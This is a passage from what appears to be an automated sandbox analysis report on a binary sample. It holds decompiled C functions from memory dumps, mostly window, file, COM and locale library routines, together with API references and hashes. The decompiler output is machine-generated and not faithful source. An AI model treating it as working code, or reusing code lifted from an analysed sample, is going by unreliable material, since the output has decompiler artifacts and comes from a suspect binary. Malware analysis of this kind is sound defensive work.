								E0041F6EA(E00431BFC, _t181, 0, _t222);
								_t214 = E0040F014(0x104);
								 *((intOrPtr*)(_t230 - 0x10)) = _t214;
								_t179 = 0;
								 *((intOrPtr*)(_t230 - 4)) = 0;
								if(_t214 != 0) {
									_t179 = E0040D519(_t214);
								}
								return E0041F7C2(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00417358
CoTaskMemAlloc.OLE32(?,?), ref: 00417476
_memset.LIBCMT ref: 00417498
CoTaskMemFree.OLE32(?), ref: 00417674

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
Instruction ID: b46673a723d36e3b76cc53f0188287a817d86e82d50fda7b55772a3566616555
Opcode Fuzzy Hash: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
Instruction Fuzzy Hash: 17C11A70604709AFCB14DF69C884AAAB7F5FF88314B20891EF816CB391D778E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004181EB, Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E004181EB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E0041F6EA(E004332B3, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x436a4c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E0041A100(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E00416BFF(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E00412C14( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E00412C14(_t161);
								_push(_t161);
								E00402F0C(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E00417FCA(_t162, _t193);
								_push(_t162);
								E00402F0C(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E0041F7C2(E0041A1FB( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E00406B97(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E0041A100( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E00402F0C(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E00402F0C(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x439520);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x439660);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

APIs

__EH_prolog3.LIBCMT ref: 004181F2
VariantClear.OLEAUT32(?), ref: 004182B6
CoTaskMemFree.OLE32(?,00000010), ref: 00418363
CoTaskMemFree.OLE32(?,00000010), ref: 00418371

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
Instruction ID: 59d339b82a7be658d62f54fd823bf36d6654d79d954229c5207d740f0b8cb97e
Opcode Fuzzy Hash: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
Instruction Fuzzy Hash: FD713871A00A069FCB20DFA5C9C49AEB7F1BF48304724096EE556DB661CB39EC81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 022E21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022E21F9
SetLastError.KERNEL32(0000007E), ref: 022E223B

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 2958ae34cc9a1878924351eb8dc68cb06be18fae96916e0f37081bb55cf001f5
Instruction ID: bda8353d5a9e7c8d07df6a302c66c5f4b371bb5ead888de839b58fac594719fe
Opcode Fuzzy Hash: 2958ae34cc9a1878924351eb8dc68cb06be18fae96916e0f37081bb55cf001f5
Instruction Fuzzy Hash: 7281B974A10209DFDB04CF94C894BAEBBB5FF48314F548698E90AAB355C774EA81DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00417E15, Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00417E15(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E0040AF65(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E00409C97(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E0040CA11(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E0040CA4F(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x4369e0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x436a38,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x439320, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x439310, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x4395b0, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E0041733F(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CA4F(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CA4F(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_t2 =  &_v76; // 0x4423e8
					_v76 = 0x442480;
					E0041F7F4(_t2, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, 0, _t147, _t154);
					_t127 = E0040F014(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E0040D519(_t127);
					}
					return E0041F7C2(_t70);
				}
			}

APIs

IsWindowVisible.USER32(?), ref: 00417E46
GetDesktopWindow.USER32 ref: 00417E56
GetWindowRect.USER32 ref: 00417E6F
GetWindowRect.USER32 ref: 00417E7B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
Instruction ID: 8e4b7480244538acadc42369d4a2fea37553eaefd090f2d635b64ddf38e68156
Opcode Fuzzy Hash: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
Instruction Fuzzy Hash: 3651D975A0020AEFCB00DFE8C984DAEBBB9FF48344B2445A9F505E7251CB35AD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2DE, Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B2DE(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E0041F330(__ecx, _t102, 0, 0x128);
				E00402FE8(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x43664c; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E0041B166( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E0041B280( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E0041B166( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E0041B280( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E0041B166( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E0041B280( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

APIs

_memset.LIBCMT ref: 0041B2F5

Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8

GetFileTime.KERNEL32(?,?,?,?), ref: 0041B32C
GetFileSize.KERNEL32(?,00000000), ref: 0041B341

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
Instruction ID: ab47600a3e4a610a652e78fe131df308bb0f6e3dfc8c5e458132c93997bab673
Opcode Fuzzy Hash: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
Instruction Fuzzy Hash: BF413E715007099FCB24DF65C9858EBB7F8FF083507108A2EE5A6D3690E734E984CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE23, Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CE23(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E0041A1B3( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E00406B97( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E00406B97( &_a4)));
								_v8 =  *((intOrPtr*)(E00406B97( &_a4)));
								if((E0040CB3B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E0040CC2A( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E0040CC2A( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E0040CB3B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CE57
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CEBC
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CF01
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0040CF2A

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
Instruction ID: 66e3d6775930df425968a4b0a54b9f9d1576368976f6134ca70a6ff43a027803
Opcode Fuzzy Hash: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
Instruction Fuzzy Hash: A2319070500115FBDB24DF51C8C5EAE7BA9EF41390F10817BF905AB291DA38AD40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042CE52, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042CE52(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0041E998( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00425DF3( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0041F8D2(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042CE82
__isleadbyte_l.LIBCMT ref: 0042CEB6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CEE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CF55

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
Instruction ID: 976c8db8c8d1bf3a5b4f198b380441d655359f927b8502cec911b7ca074ebcd7
Opcode Fuzzy Hash: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
Instruction Fuzzy Hash: 7B31F431B10265EFDB20DFA4E8C09BE7BA5BF02310F9685AAF4609B291D334DD50DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415210, Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00415210(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E0041F6EA(E00432E8C, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x436aa8;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E0040DBE0(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E004037E3(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E0040E644(_t68, _t71, _t77, _t80, __eflags);
